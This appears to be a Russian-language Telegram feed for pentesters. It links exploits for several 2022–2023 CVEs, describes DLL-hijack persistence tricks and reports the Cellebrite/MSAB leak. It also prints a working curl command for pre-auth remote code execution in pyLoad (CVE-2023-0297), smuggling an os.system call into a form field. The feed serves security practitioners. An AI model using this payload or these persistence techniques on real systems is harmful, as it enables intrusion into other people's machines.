Списки docker образов для прокачки Пентеста
for pentesterts

CVE-2023-0210
В новый год, с новыми дырами
Flaw in Linux Kernel Allows Unauthenticated remote DOS Attacks
POC - ручками наберете

#linux #kernel

CVE-2023-21752
Свежайшая Дыра (от 10 января) в службе резервного копирования Windows
LPE от юзера до системы
About vuln
exploit

#windows #exploit #lpe

CVE-2022-3656
*
Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.
Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера.

Новость по утечке в mail.ru - шляпа.
И ничего полезного в ней нет. Разве что чисто на прозвон
3505917 строк

охх))) RecycleBin снова в деле ! )

RecyclePersist

Сжато, ёмко, всеобъемлюще, БАЗА !!!))))
Для этих гребаных web-мастеров - motherfuckingwebsite.com
Этому не научат на курсах
Что то даже БаШорг вспомнился версии 2004 года....

#humor #web #lol

ExplorerPersist
перехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.
Ну а Persistence в том что отрабатывает каждый раз при запуске проводника
download

next generation Firewall - а главное, надежный 😜

Cellebrite & MSAB
Данные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.
*
Утечка включает в себя фактическое программное обеспечение, а также документацию.
*
Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру.

ChatGPT - для RedTeam и BlueTeam

Годная статья с хорошими примерами

Читать OpenAI ChatGPT for Cyber Security

Если нет учетки OpenAI - попробовать свои силы можно в нашем боте

#openAI

Windows Kernel Elevation of Privilege Vulnerability.
CVE-2022-21881
cve-2022-21881-io_completion-poc.cpp

CVE-2023-0297
Pre-auth RCE in pyLoad
read
Exploit Code:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://<target>/flash/addcrypted2'

ОТСТАВИТЬ ПАНИКУ
БОТ был и останется бесплатным.
Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:
1. Допуск по телеграмм id для всех желающих
или
2. Допуск как и раньше, но с таймаутом сообщений в 30 сек
3. симбиоз первого и второго варианта

CVE-2022-46463
Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.

Вообще Харбор крутая штука, для devops\devsecops

exploit

#harbor #repo

NGINXConfig
Самый простой способ настроить производительный, безопасный и стабильный NGINX сервер.
Ну вдруг вам нужно, натыкали галочек, получили конфиг.
НаТыкать

#nginx

CVE-2023-22809 - опять Sudo, опять bypass😏

#Unix #linux #sudo #bypass